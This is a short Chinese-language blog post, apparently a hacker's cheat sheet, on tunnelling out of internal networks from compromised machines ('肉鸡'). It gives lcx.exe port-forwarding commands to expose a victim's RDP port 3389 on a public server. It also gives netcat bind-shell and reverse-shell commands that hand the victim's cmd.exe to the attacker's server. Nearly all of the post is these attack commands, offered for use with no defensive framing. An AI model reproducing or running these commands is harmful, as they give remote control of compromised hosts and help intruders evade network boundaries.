内网转发姿势

一、lcx的使用

1.肉鸡上执行:lcx.exe –slave 公网ip +端口 肉鸡ip +端口

例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389

意思是把肉鸡的3389端口转发到xxx.xxx.xxx.xxx公网的10000端口

2.公网ip机器上执行 Lcx.exe –listen 10000 10001

例如:Lcx.exe –listen 10001 10000

意思是监听公网ip机器上的10001端口请求,并将10001的请求传送给10000端口。

此时,RDP连接,只需要输入 127.0.0.1:10000,即可远程连接到肉鸡上。

二、nc反弹cmdshell

1.开启肉鸡代理执行cmdshell

在肉鸡上执行 nc -l -p 2333 -t -e cmd.exe

意思是,肉鸡监听本地的2333端口,且应答通过telnet(-t)模式执行cmd.exe程序

在自己的公网服务器上执行 nc -nvv 肉鸡ip 2333

2.反向代理执行cmdshell

在公网服务器上运行nc -l -p 2333

意思是监听本地端口2333,登台其他电脑登陆过来

在肉鸡上执行 nc -t -e cmd.exe 公网服务器ip 2333

意思是让肉鸡可以通过telnet模式执行cmd.exe程序,并可以把执行权通过2333端口给公网服务器

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码